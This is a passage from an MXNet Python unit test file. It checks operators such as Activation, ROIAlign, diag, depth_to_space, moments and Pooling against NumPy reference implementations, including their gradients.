    act_sym = mx.sym.Activation(data, act_type='relu', name='act')
    check_name(act_sym, ['act_output'])
    cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
    check_name(cc_sym, ['concat_output'])
    sm_sym = mx.sym.softmax(data, name='softmax')
    check_name(sm_sym, ['softmax_output'])
    sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
    check_name(sa_sym, ['softmax_output'])
    us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
                               name='upsampling')
    check_name(us_sym, ['upsampling_output'])
    us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
                            name='pooling')
    check_name(us_sym, ['pooling_output'])
    # Bug fix: the variable used to be deleted unconditionally, which
    # raised KeyError on Windows where it was never set; only delete it
    # when it was actually set above.
    if not is_windows:
        del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
    """Monitor callback with monitor_all=True must report input blobs as
    well as outputs, in the expected order."""
    def check_name(op_sym, expected_names):
        output_names = []

        def get_output_names_callback(name, arr):
            output_names.append(py_str(name))

        op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
        op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
        try:
            op_exe.forward()
            mx.nd.waitall()
        except mx.base.MXNetError:
            # skip errors since test is to check all names
            pass
        for output_name, expected_name in zip(output_names, expected_names):
            assert output_name == expected_name

    is_windows = sys.platform.startswith('win')
    # Disable subgraph in case subgraph will replace symbol.  Windows
    # doesn't support setting environment variables on the fly, so the
    # environment is left untouched there.
    if not is_windows:
        os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
    data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
    conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
    check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
    deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
    check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
    fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
    check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
    lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
    check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
    act_sym = mx.sym.Activation(data, act_type='relu', name='act')
    check_name(act_sym, ['data', 'act_input0', 'act_output'])
    cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
    check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
    sm_sym = mx.sym.softmax(data, name='softmax')
    check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
    length = mx.sym.Variable("length", shape=(10, 10, 10))
    sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
    check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
    sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
    check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
    us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
                               name='upsampling')
    check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
    us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
                            name='pooling')
    check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
    # Bug fix: the variable used to be deleted unconditionally, which
    # raised KeyError on Windows where it was never set; only delete it
    # when it was actually set above.
    if not is_windows:
        del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
    """Compare Activation act_types against NumPy references and run
    finite-difference gradient checks over several shapes and dtypes."""
    shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
    # Per-dtype tolerances: float64, float32, float16.
    dtype_l = [np.float64, np.float32, np.float16]
    rtol_l = [1e-7, 1e-6, 1e-2]
    atol_l = [1e-7, 1e-6, 1e-2]
    rtol_fd = 1e-5
    atol_fd = 1e-6
    num_eps = 1e-6
    # Entry layout: [mx op, numpy forward, numpy derivative, low, high].
    unary_ops = {
        'relu': [
            lambda x: mx.sym.Activation(x, act_type='relu'),
            lambda x: np.maximum(x, 0.),
            lambda x: 1. * (x > 0.),
            -5.0, 5.0],
        'sigmoid': [
            lambda x: mx.sym.Activation(x, act_type='sigmoid'),
            lambda x: 1. / (np.exp(-x) + 1.),
            lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
            -3.0, 3.0],
        'tanh': [
            lambda x: mx.sym.Activation(x, act_type='tanh'),
            lambda x: np.tanh(x),
            lambda x: 1. - np.tanh(x) ** 2,
            -4.0, 4.0],
        'softrelu': [
            lambda x: mx.sym.Activation(x, act_type='softrelu'),
            lambda x: np.log(1. + np.exp(x)),
            lambda x: 1. - 1 / (1 + np.exp(x)),
            -3.0, 3.0],
        'softsign': [
            lambda x: mx.sym.Activation(x, act_type='softsign'),
            lambda x: x / (1. + np.abs(x)),
            lambda x: 1. / np.square(1. + np.abs(x)),
            -3.0, 3.0],
    }
    for name, op in unary_ops.items():
        fwd_mx, fwd_np, bwd_np, low, high = op
        for shape in shapes:
            # NumPy comparison at every dtype.
            for dtype, rtol, atol in zip(dtype_l, rtol_l, atol_l):
                compare_forw_backw_unary_op(
                    name, fwd_mx, fwd_np, bwd_np, shape, low, high, rtol,
                    atol, dtype)
            # Finite differences only at float64.
            finite_diff_unary_op(
                name, fwd_mx, shape, low, high, rtol_fd, atol_fd, num_eps)
@with_seed()
def test_ravel():
    """ravel_multi_index and unravel_index must be mutually inverse."""
    # be aware that check_symbolic_forward will use float type internally
    # for the arrays and that limits the representable flat index range.
    # Taking dim==4 and a range of [0,..,100] for the data can already
    # cause precision issues and break this test.
    for ndim in [1, 2, 3, 4]:
        coords = np.random.randint(50, size=(ndim, 500))
        # Shape just large enough to hold the largest coordinate per axis.
        target_shape = tuple(np.add(np.amax(coords, axis=1), [1]))
        sym_in = mx.sym.Variable('a')
        flat = np.ravel_multi_index(coords, target_shape)
        raveled = mx.sym.ravel_multi_index(sym_in, shape=target_shape)
        check_symbolic_forward(raveled, location={'a': coords}, expected=[flat])
        unraveled = mx.sym.unravel_index(sym_in, shape=target_shape)
        check_symbolic_forward(unraveled, location={'a': flat}, expected=[coords])
        # Repeat with the leading dimension given as -1 (to be inferred).
        open_shape = (-1,) + target_shape[1:]
        raveled = mx.sym.ravel_multi_index(sym_in, shape=open_shape)
        check_symbolic_forward(raveled, location={'a': coords}, expected=[flat])
        unraveled = mx.sym.unravel_index(sym_in, shape=open_shape)
        check_symbolic_forward(unraveled, location={'a': flat}, expected=[coords])
def test_context_num_gpus():
    """num_gpus() must report a non-negative count on GPU and CPU hosts alike."""
    try:
        # The suite runs on both GPU and CPU-only hosts, so no exact count
        # can be asserted.
        assert mx.context.num_gpus() >= 0
    except mx.MXNetError as e:
        # On a CPU-only host CUDA sometimes fails to determine the GPU count;
        # tolerate only that failure mode and re-raise anything else.
        if "CUDA" not in str(e):
            raise e
@with_seed()
def test_op_roi_align():
    """Check mx.nd.contrib.ROIAlign forward/backward against a pure-numpy
    reference implementation, and verify gradients numerically via autograd.
    All reference math is carried out in float32 (T) to mirror the operator.
    """
    T = np.float32
    def assert_same_dtype(dtype_a, dtype_b):
        '''
        Assert whether the two data type are the same
        Parameters
        ----------
        dtype_a, dtype_b: type
            Input data types to compare
        '''
        assert dtype_a == dtype_b,\
            TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
    def bilinear_interpolate(bottom, height, width, y, x):
        # Returns the bilinearly interpolated value at (y, x) and the list of
        # (row, col, weight) triples used to scatter the gradient back.
        if y < -1.0 or y > height or x < -1.0 or x > width:
            # Point lies outside the feature map: value 0, no gradient.
            return T(0.0), []
        x = T(max(0.0, x))
        y = T(max(0.0, y))
        x_low = int(x)
        y_low = int(y)
        # Clamp to the last valid cell at the right/bottom border.
        if x_low >= width - 1:
            x_low = x_high = width - 1
            x = T(x_low)
        else:
            x_high = x_low + 1
        if y_low >= height - 1:
            y_low = y_high = height - 1
            y = T(y_low)
        else:
            y_high = y_low + 1
        # Fractional offsets (l*) and their complements (h*).
        ly = y - T(y_low)
        lx = x - T(x_low)
        hy = T(1.0) - ly
        hx = T(1.0) - lx
        v1 = bottom[y_low, x_low]
        v2 = bottom[y_low, x_high]
        v3 = bottom[y_high, x_low]
        v4 = bottom[y_high, x_high]
        w1 = hy * hx
        w2 = hy * lx
        w3 = ly * hx
        w4 = ly * lx
        assert_same_dtype(w1.dtype, T)
        assert_same_dtype(w2.dtype, T)
        assert_same_dtype(w3.dtype, T)
        assert_same_dtype(w4.dtype, T)
        val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
        assert_same_dtype(val.dtype, T)
        grad = [(y_low, x_low, w1), (y_low, x_high, w2),
                (y_high, x_low, w3), (y_high, x_high, w4)
                ]
        return val, grad
    def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
                                  position_sensitive, dy):
        # Numpy reference for ROIAlign: returns (out, [d_data, d_rois]).
        # d_rois is always zero — the operator does not backprop into rois.
        N, C, H, W = data.shape
        R = rois.shape[0]
        PH, PW = pooled_size
        assert rois.ndim == 2,\
            ValueError(
                'The ndim of rois should be 2 rather than %d' % rois.ndim)
        assert rois.shape[1] == 5,\
            ValueError(
                'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
        assert_same_dtype(data.dtype, T)
        assert_same_dtype(rois.dtype, T)
        # In position-sensitive mode each output channel reads from its own
        # bank of PH*PW input channels.
        C_out = C // PH // PW if position_sensitive else C
        out = np.zeros((R, C_out, PH, PW), dtype=T)
        dx = np.zeros_like(data)
        drois = np.zeros_like(rois)
        for r in range(R):
            batch_ind = int(rois[r, 0])
            # ROI corners, scaled from image to feature-map coordinates.
            sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
            roi_w = T(max(ew - sw, 1.0))
            roi_h = T(max(eh - sh, 1.0))
            bin_h = roi_h / T(PH)
            bin_w = roi_w / T(PW)
            bdata = data[batch_ind]
            if sampling_ratio > 0:
                roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
            else:
                # Adaptive sampling: one sample per unit of bin extent.
                roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
                roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
            count = T(roi_bin_grid_h * roi_bin_grid_w)
            for c in range(C_out):
                for ph in range(PH):
                    for pw in range(PW):
                        val = T(0.0)
                        c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
                        # Average the bilinear samples over the bin grid.
                        for iy in range(roi_bin_grid_h):
                            y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
                                bin_h / T(roi_bin_grid_h)
                            for ix in range(roi_bin_grid_w):
                                x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
                                    bin_w / T(roi_bin_grid_w)
                                v, g = bilinear_interpolate(
                                    bdata[c_in], H, W, y, x)
                                assert_same_dtype(v.dtype, T)
                                val += v
                                # compute grad
                                for qy, qx, qw in g:
                                    assert_same_dtype(qw.dtype, T)
                                    dx[batch_ind, c_in, qy, qx] += dy[r,
                                                                     c, ph, pw] * qw / count
                        out[r, c, ph, pw] = val / count
        assert_same_dtype(out.dtype, T)
        return out, [dx, drois]
    def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
        # Compare operator output and gradients with the numpy reference.
        ctx = default_context()
        dtype = np.float32
        dlen = 224
        N, C, H, W = 5, 3, 16, 16
        R = 7
        pooled_size = (3, 4)
        # Position-sensitive mode needs C to be a multiple of PH*PW.
        C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
        spatial_scale = H * 1.0 / dlen
        data = mx.nd.array(
            np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
        # Random ROIs built as (center +/- half extent), prefixed by batch index.
        center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
        wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
        batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
        pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
        rois = mx.nd.concat(batch_ind, pos, dim=1)
        data.attach_grad()
        rois.attach_grad()
        with mx.autograd.record():
            output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
                                            spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
                                            position_sensitive=position_sensitive)
        C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
        dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
                                  pooled_size, ctx=ctx, dtype=dtype)
        output.backward(dy)
        real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
                                                             spatial_scale, sampling_ratio,
                                                             position_sensitive, dy.asnumpy())
        assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
        assert_almost_equal(data.grad.asnumpy(), dx, atol=1e-3)
        assert_almost_equal(rois.grad.asnumpy(), drois, atol=1e-3)
    # modified from test_roipooling()
    def test_roi_align_autograd(sampling_ratio=0):
        # Numeric gradient check through the symbolic interface, for both
        # 'write' and 'add' gradient request types on data.
        ctx = default_context()
        data = mx.symbol.Variable(name='data')
        rois = mx.symbol.Variable(name='rois')
        test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
                                          sample_ratio=sampling_ratio)
        x1 = np.random.rand(4, 1, 12, 12).astype('float64')
        x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
                       [1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
        check_numeric_gradient(sym=test, location=[x1, x2],
                               grad_nodes={'data': 'write', 'rois': 'null'},
                               numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
        check_numeric_gradient(sym=test, location=[x1, x2],
                               grad_nodes={'data': 'add', 'rois': 'null'},
                               numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
    test_roi_align_value()
    test_roi_align_value(sampling_ratio=2)
    test_roi_align_value(position_sensitive=True)
    test_roi_align_autograd()
@with_seed()
def test_diag():
    """Check mx.nd.diag / mx.sym.diag against numpy.diag (1d/2d input) and
    numpy.diagonal (4d input), including backward via numeric gradients."""
    # Test 2d input
    h = np.random.randint(2,9)
    w = np.random.randint(2,9)
    a_np = np.random.random((h, w)).astype(np.float32)
    a = mx.nd.array(a_np).astype('float32')
    # k == 0
    r = mx.nd.diag(a)
    assert_almost_equal(r.asnumpy(), np.diag(a_np))
    # k == 1
    k = 1
    r = mx.nd.diag(a, k=k)
    assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
    # k == -1
    k = -1
    r = mx.nd.diag(a, k=k)
    assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
    # random k
    k = np.random.randint(-min(h,w) + 1, min(h,w))
    r = mx.nd.diag(a, k=k)
    assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
    # invalid k: offset beyond either dimension must raise
    k = max(h,w) + 1
    assertRaises(MXNetError, mx.nd.diag, a, k=k)
    # Test 2d backward, k=0
    data = mx.sym.Variable('data')
    diag_sym = mx.sym.diag(data=data)
    check_numeric_gradient(diag_sym, [a_np])
    # Test 2d backward, k=1
    data = mx.sym.Variable('data')
    diag_sym = mx.sym.diag(data=data, k=1)
    check_numeric_gradient(diag_sym, [a_np])
    # Test 2d backward, k=-1
    data = mx.sym.Variable('data')
    diag_sym = mx.sym.diag(data=data, k=-1)
    check_numeric_gradient(diag_sym, [a_np])
    # test 1d input
    d = np.random.randint(2,9)
    a_np = np.random.random((d))
    a = mx.nd.array(a_np)
    # k is random
    k = np.random.randint(-d,d)
    r = mx.nd.diag(a, k=k)
    assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
    # Test 1d backward, k=0
    data = mx.sym.Variable('data')
    diag_sym = mx.sym.diag(data=data)
    check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=1
    data = mx.sym.Variable('data')
    diag_sym = mx.sym.diag(data=data, k=1)
    check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=-1
    data = mx.sym.Variable('data')
    diag_sym = mx.sym.diag(data=data, k=-1)
    check_numeric_gradient(diag_sym, [a_np])
    # Test 4d input
    x1 = np.random.randint(3,9)
    x2 = np.random.randint(3,9)
    x3 = np.random.randint(3,9)
    x4 = np.random.randint(3,9)
    a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
    a = mx.nd.array(a_np).astype('float32')
    # k = 0, axis1=0, axis2=1
    r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
    assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=0, axis1=0, axis2=1))
    # k = 1, axis1=1, axis2=0
    r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
    assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=1, axis1=1, axis2=0))
    # k = -1, axis1=1, axis2=3
    r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
    assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
    # k = 2, axis1=-2, axis2=0
    r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
    assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
    # Test 4d backward, k=0, axis1=3, axis2=0
    data = mx.sym.Variable('data')
    diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
    check_numeric_gradient(diag_sym, [a_np])
    # Test 4d backward, k=1, axis1=1, axis2=2
    data = mx.sym.Variable('data')
    diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
    check_numeric_gradient(diag_sym, [a_np])
    # Test 4d backward, k=-1, axis1=2, axis2=0
    data = mx.sym.Variable('data')
    diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
    check_numeric_gradient(diag_sym, [a_np])
    # Test 4d backward, k=-2, axis1=1, axis2=-1
    data = mx.sym.Variable('data')
    diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
    check_numeric_gradient(diag_sym, [a_np])
@with_seed()
def test_depthtospace():
    """Validate depth_to_space against a numpy reference, plus error cases."""
    def numpy_depth_to_space(x, blocksize):
        # Reference: split the channel dim into two block factors and
        # interleave them into the spatial dims.
        b, c, h, w = x.shape
        folded = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
        permuted = np.transpose(folded, [0, 3, 4, 1, 5, 2])
        return np.reshape(permuted, [b, c // (blocksize**2), h * blocksize, w * blocksize])
    # Random problem size; channels must be a multiple of block**2.
    block = random.randint(2, 4)
    rand_mul1 = random.randint(1, 4)
    n = random.randint(1, 5)
    c = block * block * rand_mul1
    h = random.randint(1, 5)
    w = random.randint(1, 5)
    shape_inp = (n, c, h, w)
    data = rand_ndarray(shape_inp, 'default')
    data_np = data.asnumpy()
    expected = numpy_depth_to_space(data_np, block)
    output = mx.nd.depth_to_space(data, block)
    assert_almost_equal(output.asnumpy(), expected, atol=1e-3, rtol=1e-3)
    shape_out = (n, c // (block ** 2), h * block, w * block)
    sym_in = mx.sym.Variable('data')
    dts_sym = mx.sym.depth_to_space(sym_in, block)
    check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
    check_symbolic_forward(dts_sym, [data_np], [expected])
    check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
    def check_invalid_depth_dim():
        # Channel count not divisible by block**2 must be rejected.
        bad = rand_ndarray((n, block - 1, h, w), 'default')
        assertRaises(MXNetError, mx.nd.depth_to_space, bad, block)
    def check_invalid_space_dim():
        # Zero-sized spatial dim must be rejected.
        bad = rand_ndarray((n, block ** 2, 0, block + 1), 'default')
        assertRaises(MXNetError, mx.nd.depth_to_space, bad, block)
    def check_invalid_block_size():
        # Block size of 0 is invalid regardless of shape.
        bad = rand_ndarray((n, c, h, w), 'default')
        assertRaises(MXNetError, mx.nd.depth_to_space, bad, 0)
    check_invalid_depth_dim()
    check_invalid_space_dim()
    check_invalid_block_size()
@with_seed()
def test_spacetodepth():
    """Validate space_to_depth against a numpy reference, plus error cases."""
    def numpy_space_to_depth(x, blocksize):
        # Reference: fold blocksize x blocksize spatial tiles into channels.
        b, c, h, w = x.shape
        folded = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
        permuted = np.transpose(folded, [0, 3, 5, 1, 2, 4])
        return np.reshape(permuted, [b, c * (blocksize**2), h // blocksize, w // blocksize])
    # Random problem size; spatial dims must be multiples of the block size.
    block = random.randint(2, 4)
    rand_mul1 = random.randint(1, 4)
    rand_mul2 = random.randint(1, 4)
    n = random.randint(1, 5)
    c = random.randint(1, 5)
    h = block * rand_mul1
    w = block * rand_mul2
    shape_inp = (n, c, h, w)
    data = rand_ndarray(shape_inp, 'default')
    data_np = data.asnumpy()
    expected = numpy_space_to_depth(data_np, block)
    output = mx.nd.space_to_depth(data, block)
    assert_almost_equal(output.asnumpy(), expected, atol=1e-3, rtol=1e-3)
    shape_out = (n, c * (block ** 2), h // block, w // block)
    sym_in = mx.sym.Variable('data')
    std_sym = mx.sym.space_to_depth(sym_in, block)
    check_numeric_gradient(std_sym, [np.ones(shape_inp)])
    check_symbolic_forward(std_sym, [data_np], [expected])
    check_symbolic_backward(std_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
    def check_invalid_space_dim():
        # Spatial dim not divisible by the block size must be rejected.
        bad = rand_ndarray((n , c, block - 1, w), 'default')
        assertRaises(MXNetError, mx.nd.space_to_depth, bad, block)
    def check_invalid_block_size():
        # Block size of 0 is invalid regardless of shape.
        bad = rand_ndarray((n, c, h, w), 'default')
        assertRaises(MXNetError, mx.nd.space_to_depth, bad, 0)
    def check_invalid_depth_dim():
        # Zero channels must be rejected.
        bad = rand_ndarray((n, 0, h, w), 'default')
        assertRaises(MXNetError, mx.nd.space_to_depth, bad, block)
    check_invalid_space_dim()
    check_invalid_block_size()
    check_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
    """Compare softmax_cross_entropy with a numpy cross-entropy reference."""
    def np_cross_entropy(probs, one_hot):
        # Summed cross-entropy over the whole batch.
        return np.sum(-np.log(probs) * one_hot)
    data = mx.sym.Variable('data')
    label = mx.sym.Variable('label')
    sym = mx.sym.softmax_cross_entropy(data=data, label=label)
    num_labels = random.randint(100, 200)
    batch_size = random.randint(100, 200)
    np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
    np_sm = np_softmax(np_data)
    np_label = np.random.randint(0, num_labels, (batch_size, ))
    # One-hot encode the integer labels for the numpy reference.
    np_one_hot_label = np.zeros((batch_size, num_labels))
    np_one_hot_label[np.arange(batch_size), np_label] = 1.
    expected_loss = np.array([np_cross_entropy(np_sm, np_one_hot_label)])
    check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label},
                           [expected_loss], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
    """split_v2 forward/backward against numpy.split at random indices."""
    dim = random.randint(2, 6)
    shape = rand_shape_nd(dim)
    axis = random.randint(-dim, dim-1)
    axis_size = shape[axis]
    samples = random.randint(0, axis_size - 1)
    # Random, sorted split points strictly inside (0, axis_size).
    indices = tuple(sorted(random.sample([i for i in range(1, axis_size)], samples)))
    mx_data = rand_ndarray(shape)
    np_data = mx_data.asnumpy()
    np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
    data = mx.sym.Variable("data")
    sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
    check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
    # Backward of split is just the concatenation of the output gradients.
    out_grad = [np.ones(piece.shape) for piece in np_out]
    check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
    """mx.nd.moments / mx.sym.moments vs numpy mean/var over random axes."""
    dim = random.randint(2, 5)
    shape = rand_shape_nd(dim, dim=5)
    axes = [i for i in range(dim)]
    test_dims = random.sample(axes, random.randint(1, dim))
    test_axes = tuple(sorted(test_dims))
    np_a = np.random.uniform(-1.0, 1.0, shape)
    a = mx.nd.array(np_a)
    for keepdims in [True, False]:
        eps = 1e-3
        # Push values away from zero so the numeric gradient stays stable.
        np_a[abs(np_a) < eps] = 2 * eps
        expected_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
        expected_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
        mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
        N = np_a.size / expected_mean.size
        sym_in = mx.sym.Variable("data")
        moments_sym = mx.sym.moments(sym_in, axes=test_axes, keepdims=keepdims)
        # Combine mean and var into one output so both get checked together.
        combined_sym = mx.sym.elemwise_add(moments_sym[0], moments_sym[1])
        if expected_mean.ndim == 0:
            expected_mean = expected_mean.reshape(mx_mean.shape)
            expected_var = expected_var.reshape(mx_var.shape)
        assert expected_mean.shape == mx_mean.shape
        assert expected_var.shape == mx_var.shape
        check_symbolic_forward(combined_sym, [np_a], [expected_mean + expected_var], rtol=1e-3, atol=1e-5)
        check_numeric_gradient(combined_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
    """Correlation must reject a kernel as large as the whole input."""
    bad_kernel_size = 28
    lhs = mx.nd.array(np.random.rand(1, 1, 28, 28))
    rhs = mx.nd.array(np.random.rand(1, 1, 28, 28))
    assert_exception(
        mx.nd.Correlation,
        MXNetError,
        lhs,
        rhs,
        kernel_size=bad_kernel_size)
@with_seed()
def test_valid_kernel_size():
    """Correlation with a small odd kernel must run without error."""
    ok_kernel_size = 9
    lhs = mx.nd.array(np.random.rand(1, 1, 28, 28))
    rhs = mx.nd.array(np.random.rand(1, 1, 28, 28))
    mx.nd.Correlation(lhs, rhs, kernel_size=ok_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
    """pooling_convention="same" must produce ceil(len/stride) outputs."""
    import math
    input_data = mx.nd.array(np.random.rand(1, 1, 10))
    stride = 2
    kernel = 2
    output_data = mx.nd.Pooling(
        input_data,
        kernel=kernel,
        stride=stride,
        pad=(0, 0, 0),
        pool_type='max',
        name='pooling',
        pooling_convention="same")
    # "same" convention: output length is ceil(input length / stride).
    expected_len = math.ceil(input_data.shape[2] / stride)
    assert expected_len == output_data.shape[2]
@with_seed()
def test_invalid_max_pooling_pad_type_same():
    """Pooling with pooling_convention="same" must reject explicit padding.

    The "same" convention computes its own padding, so passing pad > 0 is a
    configuration error and should raise MXNetError.
    """
    # Note: the unused `import math` (copied from the valid-pad sibling test)
    # has been removed.
    input_data = mx.nd.array(np.random.rand(1, 1, 10))
    stride = 2
    kernel = 2
    pad = 2
    assert_exception(
        mx.nd.Pooling,
        MXNetError,
        input_data,
        stride=stride,
        kernel=kernel,
        pad=pad,
        pool_type='max',
        name='pooling',
        pooling_convention="same")
@with_seed()
def test_image_normalize():
    """Test mx.sym.image.normalize forward/backward for 3D (CHW) and 4D (NCHW)
    input, with both per-channel tuple mean/std and scalar mean/std.

    Note: the original built the expected arrays with chained views such as
    ``x[:][:][0]``, which only worked because ``x[:]`` is a no-op view, making
    it equivalent to ``x[0]`` — i.e. indexing the leading (channel) axis.
    The indexing below is the explicit, equivalent form.
    """
    # Part 1 - Test 3D input with 3D mean/std
    shape_3d = (3, 28, 28)
    mean = (0, 1, 2)
    std = (3, 2, 1)
    data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
    data_expected_3d = data_in_3d.asnumpy()
    # Per-channel normalization: (x - mean[c]) / std[c], channel axis first.
    data_expected_3d[0] = data_expected_3d[0] / 3.0
    data_expected_3d[1] = (data_expected_3d[1] - 1.0) / 2.0
    data_expected_3d[2] = data_expected_3d[2] - 2.0
    data = mx.symbol.Variable('data')
    img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
    # check forward
    check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
                           rtol=1e-5, atol=1e-5)
    # Gradient is 1/std_dev
    grad_expected_3d = np.ones(shape_3d)
    grad_expected_3d[0] = 1 / 3.0
    grad_expected_3d[1] = 1 / 2.0
    grad_expected_3d[2] = 1 / 1.0
    # check backward
    check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
                            expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
    # check backward using finite difference
    check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
    # Part 2 - Test 4D input with 3D mean/std
    shape_4d = (2, 3, 28, 28)
    data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
    data_expected_4d = data_in_4d.asnumpy()
    grad_expected_4d = np.ones(shape_4d)
    for b in range(shape_4d[0]):
        # Same per-channel normalization, applied to each batch element.
        data_expected_4d[b, 0] = data_expected_4d[b, 0] / 3.0
        data_expected_4d[b, 1] = (data_expected_4d[b, 1] - 1.0) / 2.0
        data_expected_4d[b, 2] = data_expected_4d[b, 2] - 2.0
        # Gradient is 1/std_dev per channel.
        grad_expected_4d[b, 0] = 1 / 3.0
        grad_expected_4d[b, 1] = 1 / 2.0
        grad_expected_4d[b, 2] = 1 / 1.0
    # check forward
    check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
